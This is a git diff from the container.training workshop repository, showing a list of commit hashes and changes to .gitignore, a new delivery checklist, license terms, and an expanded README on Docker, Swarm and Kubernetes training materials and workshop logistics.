|
|
3a21cbc72b | ||
|
|
5438fca35a | ||
|
|
a09521ceb1 | ||
|
|
0d6501a926 | ||
|
|
c25f7a119b | ||
|
|
1958c85a96 | ||
|
|
a7ba4418c6 | ||
|
|
d6fcbb85e8 | ||
|
|
278fbf285a | ||
|
|
ca828343e4 | ||
|
|
5c663f9e09 | ||
|
|
9debd76816 | ||
|
|
848679829d | ||
|
|
6727007754 | ||
|
|
03a563c172 | ||
|
|
cfbd54bebf | ||
|
|
7f1e9db0fa | ||
|
|
1367a30a11 | ||
|
|
31b234ee3a | ||
|
|
57dd5e295e | ||
|
|
c188923f1a | ||
|
|
7a8716d38b | ||
|
|
2e77c13297 | ||
|
|
d5279d881d | ||
|
|
34e9cc1944 | ||
|
|
2a7498e30e | ||
|
|
4689d09e1f | ||
|
|
b818a38307 | ||
|
|
7e5d869472 | ||
|
|
3eaf31fd48 | ||
|
|
fe5e22f5ae | ||
|
|
61da583080 | ||
|
|
94dfe1a0cd | ||
|
|
412dbadafd | ||
|
|
8c5e4e0b09 | ||
|
|
2ac6072d80 | ||
|
|
ef4591c4fc | ||
|
|
22dfbab09b | ||
|
|
37f595c480 | ||
|
|
1fc951037d | ||
|
|
affd46dd88 | ||
|
|
cfaff3df04 | ||
|
|
ce2451971d | ||
|
|
8cf5d0efbd | ||
|
|
f61d61223d | ||
|
|
6b6eb50f9a | ||
|
|
89ab66335f | ||
|
|
5bc4e95515 | ||
|
|
893f05e401 | ||
|
|
4abc8ce34c | ||
|
|
34d2c610bf | ||
|
|
1492a8a0bc | ||
|
|
388d616048 | ||
|
|
28589f5a83 | ||
|
|
e7a80f7bfb | ||
|
|
ea47e0ac05 | ||
|
|
09d204038f | ||
|
|
47cb0afac2 | ||
|
|
8e2e7f44d3 | ||
|
|
8c7702deda | ||
|
|
bdc1ca01cd | ||
|
|
dca58d6663 | ||
|
|
a0cf4b97c0 | ||
|
|
a1c239260f | ||
|
|
a8a2cf54a5 | ||
|
|
d5ba80da55 | ||
|
|
3f2da04763 | ||
|
|
e092f50645 | ||
|
|
7f698bd690 | ||
|
|
7fe04b9944 | ||
|
|
2671714df3 | ||
|
|
630e275d99 | ||
|
|
614f10432e | ||
|
|
223b5e152b | ||
|
|
ec55cd2465 | ||
|
|
c59510f921 | ||
|
|
0f5f481213 | ||
|
|
b40fa45fd3 | ||
|
|
8faaf35da0 | ||
|
|
ce0f79af16 | ||
|
|
faa420f9fd | ||
|
|
aab519177d | ||
|
|
5116ad7c44 | ||
|
|
7305e911e5 | ||
|
|
b2f670acf6 | ||
|
|
dc040aa693 | ||
|
|
9b7a8494b0 | ||
|
|
ae6c1bb8eb | ||
|
|
a9a4f0ea07 | ||
|
|
68af5940e3 | ||
|
|
9df5313da4 | ||
|
|
ba3f00e64e | ||
|
|
4d7a6d5c70 | ||
|
|
aef833c3f5 | ||
|
|
6f58fee29b | ||
|
|
dda09ddbcb | ||
|
|
8b13fe6eb4 | ||
|
|
21f345a96a | ||
|
|
eaa4dc63bf | ||
|
|
af5ea2188b | ||
|
|
7f23a4c964 | ||
|
|
345e04c956 | ||
|
|
2a138102fc | ||
|
|
ef5e8f00f8 | ||
|
|
badb73a413 | ||
|
|
2aced95c86 | ||
|
|
720989e829 | ||
|
|
718031565e | ||
|
|
ec7b46b779 | ||
|
|
270c36b29a | ||
|
|
bc2eb53bb2 | ||
|
|
afe7b8523c | ||
|
|
a7743a4314 | ||
|
|
ba74fdc841 | ||
|
|
41c047e12a | ||
|
|
f4fc055405 | ||
|
|
2eb6fcfbf5 | ||
|
|
c665e1a2d6 | ||
|
|
bb7cdafe47 | ||
|
|
95fcfadb17 | ||
|
|
1ef47531c8 | ||
|
|
9589b641b6 | ||
|
|
63463bda64 | ||
|
|
b642412639 | ||
|
|
21f9b73cb4 | ||
|
|
b73e5432f3 | ||
|
|
de5cc9b0bf | ||
|
|
08b38127d3 | ||
|
|
383804b7f1 | ||
|
|
20bf80910e | ||
|
|
29a2014745 | ||
|
|
40f6ee236f | ||
|
|
5551cbd11f | ||
|
|
9e84a05325 | ||
|
|
558e990907 | ||
|
|
c2e88bb343 | ||
|
|
b7582397fe | ||
|
|
3e7b8615ab | ||
|
|
6f5d8c5372 | ||
|
|
c116d75408 | ||
|
|
bb4ee4e77d | ||
|
|
fc0e46988c | ||
|
|
c71b93c3a7 | ||
|
|
2c6b79c17d | ||
|
|
f264838ec5 | ||
|
|
54e7d10226 | ||
|
|
f8d3246005 | ||
|
|
7856e8c5f2 | ||
|
|
69bafe332f | ||
|
|
e2b24a20d2 | ||
|
|
d2d1771fd3 | ||
|
|
6c5e3eb3f3 | ||
|
|
d99dbd5878 | ||
|
|
6d4894458a | ||
|
|
bc367a1297 | ||
|
|
31d1074ee0 | ||
|
|
cd18a87b8c | ||
|
|
8279a3bce9 | ||
|
|
93524898cc | ||
|
|
e9319060f6 | ||
|
|
4322478a4a | ||
|
|
00262c767e | ||
|
|
c8030e1500 | ||
|
|
3717b90444 | ||
|
|
d003bdb765 | ||
|
|
8b246ac334 | ||
|
|
9df543a6bb | ||
|
|
77befc1092 | ||
|
|
4417771315 | ||
|
|
04fa6ec1d8 | ||
|
|
5e8bdcb1f6 | ||
|
|
07d99763d3 | ||
|
|
87a2051b24 | ||
|
|
0eddc876f1 | ||
|
|
1a67a1397b | ||
|
|
dc6bf9d0cf | ||
|
|
84f8bf007e | ||
|
|
6a2a66c165 | ||
|
|
f491d559e3 | ||
|
|
5d9bdc303c | ||
|
|
f7f0ecddd4 | ||
|
|
f0f03e2440 | ||
|
|
1f78264e9f | ||
|
|
2aad5319f9 | ||
|
|
479b858398 | ||
|
|
34b8bfd1b2 | ||
|
|
408036b09c | ||
|
|
a45ec1cb84 | ||
|
|
8decf1852f | ||
|
|
350fac21f6 | ||
|
|
cedd386eee | ||
|
|
5751765d66 | ||
|
|
7293c071bd | ||
|
|
98cf8f4f04 | ||
|
|
c61ccd1c27 | ||
|
|
6b3d0efa56 | ||
|
|
164578f1c8 | ||
|
|
938fe956cf | ||
|
|
b44d402c1d | ||
|
|
fbaa511813 | ||
|
|
f000594c62 | ||
|
|
71ba94063e | ||
|
|
b025a8c966 | ||
|
|
c36aab132b | ||
|
|
1e7a47ed37 | ||
|
|
87f544774e | ||
|
|
db9ee5f03a | ||
|
|
d0f5d69157 | ||
|
|
742c7a78bc | ||
|
|
918d3a6c23 | ||
|
|
1f9b304eec | ||
|
|
f479591f9c | ||
|
|
241452bab4 | ||
|
|
5a58b17bb5 | ||
|
|
2f4dfe7b6f | ||
|
|
dad3d434b8 | ||
|
|
3534d81860 | ||
|
|
1c4d1d736e | ||
|
|
c00bbb77c4 | ||
|
|
0b24076086 | ||
|
|
c1a156337f | ||
|
|
078023058b | ||
|
|
c1ecd16a8d | ||
|
|
51cf4a076a | ||
|
|
7cf622e06a | ||
|
|
14b2d54e43 | ||
|
|
3c9353815b | ||
|
|
a44d3618bc | ||
|
|
5466319407 | ||
|
|
1d5f4330c0 | ||
|
|
9e5bab1a76 | ||
|
|
c67675f900 | ||
|
|
4c18583a8e | ||
|
|
d02d71270f | ||
|
|
deb304026b | ||
|
|
03561f38d8 | ||
|
|
4965b205a7 | ||
|
|
0d610081bd | ||
|
|
24c2f9f18e | ||
|
|
3fc2d4c266 | ||
|
|
0c175615a5 | ||
|
|
3198bb0d1f | ||
|
|
030d100d70 | ||
|
|
4747860226 | ||
|
|
b243094d66 | ||
|
|
1fec8f506a | ||
|
|
04362a3b52 | ||
|
|
f0597c43b3 | ||
|
|
b11e54cc43 | ||
|
|
01d9923ca4 | ||
|
|
0f3660dc95 | ||
|
|
60a75647d2 | ||
|
|
f46856ff63 | ||
|
|
0508d24046 | ||
|
|
1d46898737 | ||
|
|
5b95d6ee7f | ||
|
|
bb88d11344 | ||
|
|
7262effec4 | ||
|
|
2c08439de4 | ||
|
|
6543ffc5b9 | ||
|
|
681754fc1b | ||
|
|
603bda8166 | ||
|
|
a4a37368e5 | ||
|
|
30fd53a3e1 | ||
|
|
40eab78186 | ||
|
|
68e0c8fca7 | ||
|
|
af261de9a4 | ||
|
|
2a176edfb4 | ||
|
|
f56262bee0 | ||
|
|
488fa1c981 | ||
|
|
f63107ce15 | ||
|
|
68fc895017 | ||
|
|
5c0b83cd1b | ||
|
|
452b5c0880 | ||
|
|
42549d8c19 | ||
|
|
9a5e9c9ea0 | ||
|
|
1ea7141d95 | ||
|
|
c0fbf4aec4 | ||
|
|
48b79a18a4 | ||
|
|
2c5724a5fe | ||
|
|
80d79c4d31 | ||
|
|
ff0c868c27 | ||
|
|
cbee7484ae | ||
|
|
35a8c81b39 | ||
|
|
764d33c884 | ||
|
|
a4fc5b924f | ||
|
|
b155000d56 | ||
|
|
baf48657d0 | ||
|
|
b4b22ff47b | ||
|
|
c4b131ae5e | ||
|
|
af1031760b | ||
|
|
da7c4742bf | ||
|
|
a3cf917100 | ||
|
|
96a5cc15ec | ||
|
|
117c6c18e9 | ||
|
|
fe83ce99f2 | ||
|
|
8b0173bc87 | ||
|
|
9450ed2057 | ||
|
|
994be990f5 | ||
|
|
e2fd9531ef | ||
|
|
8bb7243aaf | ||
|
|
9a067f2064 | ||
|
|
009bc2089d | ||
|
|
d1e6248ded | ||
|
|
b3a7e36c37 | ||
|
|
a9a82ccd1e | ||
|
|
6abbebe00d | ||
|
|
4dec9c43f1 | ||
|
|
3369005e06 | ||
|
|
c4d76ba367 | ||
|
|
ba24b66d84 | ||
|
|
8d2391e4d6 | ||
|
|
4c68847dd1 | ||
|
|
b67371e0ec | ||
|
|
cd2cf9b3a4 | ||
|
|
4eaf2310b6 | ||
|
|
20e9517722 | ||
|
|
553fd6b742 | ||
|
|
25c8623a81 | ||
|
|
f787d1b6c3 | ||
|
|
825257427f | ||
|
|
7e57b23234 | ||
|
|
5c102d594f | ||
|
|
e28a64c6cf | ||
|
|
f8888bf16a | ||
|
|
ac523e0f14 | ||
|
|
3211c1ba8a | ||
|
|
f1aa5d07fa | ||
|
|
c0e2fc8832 | ||
|
|
08722db23f | ||
|
|
11ec3336eb | ||
|
|
42603d6f62 | ||
|
|
5c825c864c | ||
|
|
186b30a742 | ||
|
|
06b97454c6 | ||
|
|
c393d2aa51 | ||
|
|
3817332905 | ||
|
|
b7dbbd4633 | ||
|
|
d73f5232ff | ||
|
|
b0a34aa106 | ||
|
|
36f512a3d3 | ||
|
|
87cbbd5c35 | ||
|
|
2f6689d639 | ||
|
|
4f7651855e | ||
|
|
aea59c757e | ||
|
|
af2d82d00a | ||
|
|
5b8861009d | ||
|
|
674bfe82c7 | ||
|
|
8f61a2fffa | ||
|
|
748881d37d | ||
|
|
d29863a0e0 | ||
|
|
acc84729a2 | ||
|
|
9af9477f65 | ||
|
|
15cca15ec5 | ||
|
|
685ea653fe | ||
|
|
bf13657a8f | ||
|
|
9c7fb40475 | ||
|
|
b1b8b53a2f | ||
|
|
69259c27a1 | ||
|
|
7354974ece | ||
|
|
5379619026 | ||
|
|
0d7ee1dda0 | ||
|
|
243d585432 | ||
|
|
f5fe7152f3 | ||
|
|
94d9ad22d0 | ||
|
|
59f1b1069d | ||
|
|
c30386a73d | ||
|
|
0af160e0a8 | ||
|
|
1fdb7b8077 | ||
|
|
d2b67c426e | ||
|
|
a84cc36cd8 | ||
|
|
c8ecf5a647 | ||
|
|
e9ee050386 | ||
|
|
6e59e2092c | ||
|
|
c7b0fd32bd | ||
|
|
ead4e33604 | ||
|
|
96b4f76c67 | ||
|
|
6337d49123 | ||
|
|
aec2de848b | ||
|
|
91942f22a0 | ||
|
|
93cdc9d987 | ||
|
|
13e6283221 | ||
|
|
e56bea5c16 | ||
|
|
eda499f084 | ||
|
|
ae638b8e89 | ||
|
|
5296be32ed | ||
|
|
f1cd3ba7d0 | ||
|
|
b307adee91 | ||
|
|
f4540fad78 | ||
|
|
70db794111 | ||
|
|
abafc0c8ec | ||
|
|
a7dba759a8 | ||
|
|
b14662490a | ||
|
|
9d45168752 | ||
|
|
7b3c9cd2c3 | ||
|
|
84d4a367ec | ||
|
|
bd6b37b573 | ||
|
|
e1b2a4440d | ||
|
|
1b5365d905 | ||
|
|
27ea268026 | ||
|
|
45402a28e5 | ||
|
|
9e97c7a490 | ||
|
|
b0f566538d | ||
|
|
e637354d3e | ||
|
|
1f8c27b1aa | ||
|
|
f7d317d960 | ||
|
|
a8c54a8afd | ||
|
|
73b3752c7e | ||
|
|
d60ba2e91e | ||
|
|
d480f5c26a | ||
|
|
540aa91f48 | ||
|
|
8f3c0da385 | ||
|
|
6610ff178d | ||
|
|
9a9e725d5b | ||
|
|
09cabc556e | ||
|
|
44f4017992 | ||
|
|
6f85ff7824 | ||
|
|
514ac69a8f | ||
|
|
7418691249 | ||
|
|
4d2289b2d2 | ||
|
|
e0956be92c | ||
|
|
d623f76a02 | ||
|
|
dd555af795 | ||
|
|
a2da3f417b | ||
|
|
d129b37781 | ||
|
|
849ea6e576 | ||
|
|
7ed54eee66 | ||
|
|
1dca8e5a7a | ||
|
|
165de1dbb5 | ||
|
|
b7afd13012 | ||
|
|
e8b64c5e08 | ||
|
|
9124eb0e07 | ||
|
|
0bede24e23 | ||
|
|
ee79e5ba86 | ||
|
|
9078cfb57d | ||
|
|
6854698fe1 | ||
|
|
16a4dac192 | ||
|
|
0029fa47c5 | ||
|
|
a53636340b | ||
|
|
c95b88e562 | ||
|
|
d438bd624a | ||
|
|
839746831b | ||
|
|
0b1b589314 | ||
|
|
61d2709f8f | ||
|
|
1741a7b35a | ||
|
|
e101856dd7 | ||
|
|
d451f9c7bf | ||
|
|
b021b0eec8 | ||
|
|
e4f824fd07 | ||
|
|
019165e98c | ||
|
|
cf5c2d5741 | ||
|
|
971bf85b17 | ||
|
|
83749ade43 | ||
|
|
76fb2f2e2c | ||
|
|
6bda8147e4 | ||
|
|
95751d1ee9 | ||
|
|
12adae107e | ||
|
|
c652ea08a2 | ||
|
|
30008e4af6 | ||
|
|
bb262e27e8 | ||
|
|
9656d959cc | ||
|
|
46b772b95e | ||
|
|
f801e1b9ad | ||
|
|
1c44d7089a | ||
|
|
1f7f4a29ff | ||
|
|
e16e23e2bd | ||
|
|
b5206aa68e | ||
|
|
8a47bce180 | ||
|
|
6cd8c32621 | ||
|
|
f2f1934940 | ||
|
|
8cc388dcb8 | ||
|
|
a276e72ab0 | ||
|
|
bdb8e1b3df | ||
|
|
66ee4739ed | ||
|
|
893c7b13c6 | ||
|
|
78b730e4ac | ||
|
|
e3eb06ddfb | ||
|
|
ad29a45191 | ||
|
|
e1968beefa | ||
|
|
b1b3ecb5e9 | ||
|
|
ef60a78998 | ||
|
|
70064da91c | ||
|
|
0b6a3a1cba | ||
|
|
e403a005ea | ||
|
|
773528fc2b | ||
|
|
97af5492f7 | ||
|
|
194ce5d7b6 | ||
|
|
fafc8fb1ed | ||
|
|
4cb37481ba | ||
|
|
9196b27f0e | ||
|
|
9ce98430ab | ||
|
|
4117f079e6 | ||
|
|
1105c9fa1f | ||
|
|
ab7c1bb09a | ||
|
|
bfcb24c1ca | ||
|
|
45f410bb49 | ||
|
|
bcd2433fa4 | ||
|
|
1d02ddf271 | ||
|
|
4765410393 | ||
|
|
6102d21150 | ||
|
|
75caa65973 | ||
|
|
dfd2bf4aeb | ||
|
|
51000b4b4d | ||
|
|
3acd3b078b | ||
|
|
4b43287c5b | ||
|
|
c8c745459c | ||
|
|
04dec2e196 | ||
|
|
0f8c189786 | ||
|
|
81cc14d47b | ||
|
|
060b2377d5 | ||
|
|
1e77736987 | ||
|
|
bf2b4b7eb7 | ||
|
|
8396f13a4a |
22
.gitignore
vendored
22
.gitignore
vendored
@@ -1,8 +1,22 @@
|
||||
*.pyc
|
||||
*.swp
|
||||
*~
|
||||
prepare-vms/ips.txt
|
||||
prepare-vms/ips.html
|
||||
prepare-vms/ips.pdf
|
||||
prepare-vms/settings.yaml
|
||||
prepare-vms/tags
|
||||
prepare-vms/infra
|
||||
slides/*.yml.html
|
||||
slides/autopilot/state.yaml
|
||||
slides/index.html
|
||||
slides/past.html
|
||||
node_modules
|
||||
|
||||
### macOS ###
|
||||
# General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Windows ###
|
||||
# Windows thumbnail cache files
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
ehthumbs_vista.db
|
||||
|
||||
24
CHECKLIST.md
Normal file
24
CHECKLIST.md
Normal file
@@ -0,0 +1,24 @@
|
||||
Checklist to use when delivering a workshop
|
||||
Authored by Jérôme; additions by Bridget
|
||||
|
||||
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
|
||||
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
|
||||
- [ ] Push local branch to GitHub and merge into main repo
|
||||
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
|
||||
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
|
||||
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
|
||||
- [ ] (optional) Create chatroom
|
||||
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
|
||||
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
|
||||
- [ ] How many VMs do we need? Check with event organizers ahead of time
|
||||
- [ ] Provision VMs (slightly more than we think we'll need)
|
||||
- [ ] Change password on presenter's VMs (to forestall any hijinx)
|
||||
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
|
||||
- [ ] Print cards
|
||||
- [ ] Cut cards
|
||||
- [ ] Last-minute merge from master
|
||||
- [ ] Check that all looks good
|
||||
- [ ] DELIVER!
|
||||
- [ ] Shut down VMs
|
||||
- [ ] Update index.html to remove chat link and move session to past things
|
||||
19
LICENSE
19
LICENSE
@@ -1,13 +1,12 @@
|
||||
Copyright 2015 Jérôme Petazzoni
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
The code in this repository is licensed under the Apache License
|
||||
Version 2.0. You may obtain a copy of this license at:
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
||||
The instructions and slides in this repository (e.g. the files
|
||||
with extension .md and .yml in the "slides" subdirectory) are
|
||||
under the Creative Commons Attribution 4.0 International Public
|
||||
License. You may obtain a copy of this license at:
|
||||
|
||||
https://creativecommons.org/licenses/by/4.0/legalcode
|
||||
|
||||
|
||||
382
README.md
382
README.md
@@ -1,8 +1,271 @@
|
||||
# Orchestration at scale(s)
|
||||
# Container Training
|
||||
|
||||
This is the material for the "Docker orchestration workshop"
|
||||
written and delivered by Jérôme Petazzoni (and possibly others)
|
||||
at multiple conferences and events like:
|
||||
This repository (formerly known as `orchestration-workshop`)
|
||||
contains materials (slides, scripts, demo app, and other
|
||||
code samples) used for various workshops, tutorials, and
|
||||
training sessions around the themes of Docker, containers,
|
||||
and orchestration.
|
||||
|
||||
For the moment, it includes:
|
||||
|
||||
- Introduction to Docker and Containers,
|
||||
- Container Orchestration with Docker Swarm,
|
||||
- Container Orchestration with Kubernetes.
|
||||
|
||||
These materials have been designed around the following
|
||||
principles:
|
||||
|
||||
- they assume very little prior knowledge of Docker,
|
||||
containers, or a particular programming language;
|
||||
- they can be used in a classroom setup (with an
|
||||
instructor), or self-paced at home;
|
||||
- they are hands-on, meaning that they contain lots
|
||||
of examples and exercises that you can easily
|
||||
reproduce;
|
||||
- they progressively introduce concepts in chapters
|
||||
that build on top of each other.
|
||||
|
||||
If you're looking for the materials, you can stop reading
|
||||
right now, and hop to http://container.training/, which
|
||||
hosts all the slides decks available.
|
||||
|
||||
The rest of this document explains how this repository
|
||||
is structured, and how to use it to deliver (or create)
|
||||
your own tutorials.
|
||||
|
||||
|
||||
## Why a single repository?
|
||||
|
||||
All these materials have been gathered in a single repository
|
||||
because they have a few things in common:
|
||||
|
||||
- some [shared slides](slides/shared/) that are re-used
|
||||
(and updated) identically between different decks;
|
||||
- a [build system](slides/) generating HTML slides from
|
||||
Markdown source files;
|
||||
- a [semi-automated test harness](slides/autopilot/) to check
|
||||
that the exercises and examples provided work properly;
|
||||
- a [PhantomJS script](slides/slidechecker.js) to check
|
||||
that the slides look good and don't have formatting issues;
|
||||
- [deployment scripts](prepare-vms/) to start training
|
||||
VMs in bulk;
|
||||
- a fancy pipeline powered by
|
||||
[Netlify](https://www.netlify.com/) and continuously
|
||||
deploying `master` to http://container.training/.
|
||||
|
||||
|
||||
## What are the different courses available?
|
||||
|
||||
**Introduction to Docker** is derived from the first
|
||||
"Docker Fundamentals" training materials. For more information,
|
||||
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
|
||||
The version in this repository has been adapted to the Markdown
|
||||
publishing pipeline. It is still maintained, but only receives
|
||||
minor updates once in a while.
|
||||
|
||||
**Container Orchestration with Docker Swarm** (formerly
|
||||
known as "Orchestration Workshop") is a workshop created by Jérôme
|
||||
Petazzoni in June 2015. Since then, it has been continuously updated
|
||||
and improved, and received contributions from many others authors.
|
||||
It is actively maintained.
|
||||
|
||||
**Container Orchestration with Kubernetes** was created by
|
||||
Jérôme Petazzoni in October 2017, with help and feedback from
|
||||
a few other contributors. It is actively maintained.
|
||||
|
||||
|
||||
## Repository structure
|
||||
|
||||
- [bin](bin/)
|
||||
- A few helper scripts that you can safely ignore for now.
|
||||
- [dockercoins](dockercoins/)
|
||||
- The demo app used throughout the orchestration workshops.
|
||||
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
|
||||
- Logging and metrics stacks used in the later parts of
|
||||
the orchestration workshops.
|
||||
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
|
||||
- Contributed scripts to automate the creation of local environments.
|
||||
These could use some help to test/check that they work.
|
||||
- [prepare-vms](prepare-vms/):
|
||||
- Scripts to automate the creation of AWS instances for students.
|
||||
These are routinely used and actively maintained.
|
||||
- [slides](slides/):
|
||||
- All the slides! They are assembled from Markdown files with
|
||||
a custom Python script, and then rendered using [gnab/remark](
|
||||
https://github.com/gnab/remark). Check this directory for more details.
|
||||
- [stacks](stacks/):
|
||||
- A handful of Compose files (version 3) allowing to easily
|
||||
deploy complex application stacks.
|
||||
|
||||
|
||||
## Course structure
|
||||
|
||||
(This applies only for the orchestration workshops.)
|
||||
|
||||
The workshop introduces a demo app, "DockerCoins," built
|
||||
around a micro-services architecture. First, we run it
|
||||
on a single node, using Docker Compose. Then, we pretend
|
||||
that we need to scale it, and we use an orchestrator
|
||||
(SwarmKit or Kubernetes) to deploy and scale the app on
|
||||
a cluster.
|
||||
|
||||
We explain the concepts of the orchestrator. For SwarmKit,
|
||||
we setup the cluster with `docker swarm init` and `docker swarm join`.
|
||||
For Kubernetes, we use pre-configured clusters.
|
||||
|
||||
Then, we cover more advanced concepts: scaling, load balancing,
|
||||
updates, global services or daemon sets.
|
||||
|
||||
There are a number of advanced optional chapters about
|
||||
logging, metrics, secrets, network encryption, etc.
|
||||
|
||||
The content is very modular: it is broken down in a large
|
||||
number of Markdown files, that are put together according
|
||||
to a YAML manifest. This allows to re-use content
|
||||
between different workshops very easily.
|
||||
|
||||
|
||||
### DockerCoins
|
||||
|
||||
The sample app is in the `dockercoins` directory.
|
||||
It's used during all chapters
|
||||
for explaining different concepts of orchestration.
|
||||
|
||||
To see it in action:
|
||||
|
||||
- `cd dockercoins && docker-compose up -d`
|
||||
- this will build and start all the services
|
||||
- the web UI will be available on port 8000
|
||||
|
||||
|
||||
## Running the Workshop
|
||||
|
||||
If you want to deliver one of these workshops yourself,
|
||||
this section is for you!
|
||||
|
||||
> *This section has been mostly contributed by
|
||||
> [Bret Fisher](https://twitter.com/bretfisher), who was
|
||||
> one of the first persons to have the bravery of delivering
|
||||
> this workshop without me. Thanks Bret! 🍻
|
||||
>
|
||||
> Jérôme.*
|
||||
|
||||
|
||||
### General timeline of planning a workshop
|
||||
|
||||
- Fork repo and run through slides, doing the hands-on to be sure you
|
||||
understand the different `dockercoins` repo's and the steps we go through to
|
||||
get to a full Swarm Mode cluster of many containers. You'll update the first
|
||||
few slides and last slide at a minimum, with your info.
|
||||
- ~~Your docs directory can use GitHub Pages.~~
|
||||
- This workshop expects 5 servers per student. You can get away with as little
|
||||
as 2 servers per student, but you'll need to change the slide deck to
|
||||
accommodate. More servers = more fun.
|
||||
- If you have more then ~20 students, try to get an assistant (TA) to help
|
||||
people with issues, so you don't have to stop the workshop to help someone
|
||||
with ssh etc.
|
||||
- AWS is our most tested process for generating student machines. In
|
||||
`prepare-vms` you'll find scripts to create EC2 instances, install docker,
|
||||
pre-pull images, and even print "cards" to place at each students seat with
|
||||
IP's and username/password.
|
||||
- Test AWS Scripts: Be sure to test creating *all* your needed servers a week
|
||||
before workshop (just for a few minutes). You'll likely hit AWS limits in the
|
||||
region closest to your class, and it sometimes takes days to get AWS to raise
|
||||
those limits with a support ticket.
|
||||
- Create a https://gitter.im chat room for your workshop and update slides
|
||||
with url. Also useful for TA to monitor this during workshop. You can use it
|
||||
before/after to answer questions, and generally works as a better answer then
|
||||
"email me that question".
|
||||
- If you can send an email to students ahead of time, mention how they should
|
||||
get SSH, and test that SSH works. If they can `ssh github.com` and get
|
||||
`permission denied (publickey)` then they know it worked, and SSH is properly
|
||||
installed and they don't have anything blocking it. SSH and a browser are all
|
||||
they need for class.
|
||||
- Typically you create the servers the day before or morning of workshop, and
|
||||
leave them up the rest of day after workshop. If creating hundreds of servers,
|
||||
you'll likely want to run all these `workshopctl` commands from a dedicated
|
||||
instance you have in same region as instances you want to create. Much faster
|
||||
this way if you're on poor internet. Also, create 2 sets of servers for
|
||||
yourself, and use one during workshop and the 2nd is a backup.
|
||||
- Remember you'll need to print the "cards" for students, so you'll need to
|
||||
create instances while you have a way to print them.
|
||||
|
||||
|
||||
### Things That Could Go Wrong
|
||||
|
||||
- Creating AWS instances ahead of time, and you hit its limits in region and
|
||||
didn't plan enough time to wait on support to increase your limits. :(
|
||||
- Students have technical issues during workshop. Can't get ssh working,
|
||||
locked-down computer, host firewall, etc.
|
||||
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
|
||||
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
|
||||
prevent you from losing your place if you get disconnected from servers.
|
||||
https://tmux.github.io
|
||||
- Forget to print "cards" and cut them up for handing out IP's.
|
||||
- Forget to have fun and focus on your students!
|
||||
|
||||
|
||||
### Creating the VMs
|
||||
|
||||
`prepare-vms/workshopctl` is the script that gets you most of what you need for
|
||||
setting up instances. See
|
||||
[prepare-vms/README.md](prepare-vms)
|
||||
for all the info on tools and scripts.
|
||||
|
||||
|
||||
### Content for Different Workshop Durations
|
||||
|
||||
With all the slides, this workshop is a full day long. If you need to deliver
|
||||
it in shorter timelines, here's some recommendations on what to cut out. You
|
||||
can replace `---` with `???` which will hide slides. Or leave them there and
|
||||
add something like `(EXTRA CREDIT)` to title so students can still view the
|
||||
content but you also know to skip during presentation.
|
||||
|
||||
|
||||
#### 3 Hour Version
|
||||
|
||||
- Limit time on debug tools, maybe skip a few. *"Chapter 1:
|
||||
Identifying bottlenecks"*
|
||||
- Limit time on Compose, try to have them building the Swarm Mode by 30
|
||||
minutes in
|
||||
- Skip most of Chapter 3, Centralized Logging and ELK
|
||||
- Skip most of Chapter 4, but keep stateful services and DAB's if possible
|
||||
- Mention what DAB's are, but make this part optional in case you run out
|
||||
of time
|
||||
|
||||
|
||||
#### 2 Hour Version
|
||||
|
||||
- Skip all the above, and:
|
||||
- Skip the story arc of debugging dockercoins all together, skipping the
|
||||
troubleshooting tools. Just focus on getting them from single-host to
|
||||
multi-host and multi-container.
|
||||
- Goal is first 30min on intro and Docker Compose and what dockercoins is,
|
||||
and getting it up on one node in docker-compose.
|
||||
- Next 60-75 minutes is getting dockercoins in Swarm Mode services across
|
||||
servers. Big Win.
|
||||
- Last 15-30 minutes is for stateful services, DAB files, and questions.
|
||||
|
||||
|
||||
### Pre-built images
|
||||
|
||||
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
|
||||
|
||||
There are also three variants, for demo purposes:
|
||||
|
||||
- `dockercoins/rng:v0.2` is broken (the server won't even start),
|
||||
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
|
||||
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
|
||||
|
||||
|
||||
## Past events
|
||||
|
||||
Since its inception, this workshop has been delivered dozens of times,
|
||||
to thousands of people, and has continuously evolved. This is a short
|
||||
history of the first times it was delivered. Look also in the "tags"
|
||||
of this repository: they all correspond to successive iterations of
|
||||
this workshop. If you attended a past version of the workshop, you
|
||||
can use these tags to see what has changed since then.
|
||||
|
||||
- QCON, New York City (2015, June)
|
||||
- KCDC, Kansas City (2015, June)
|
||||
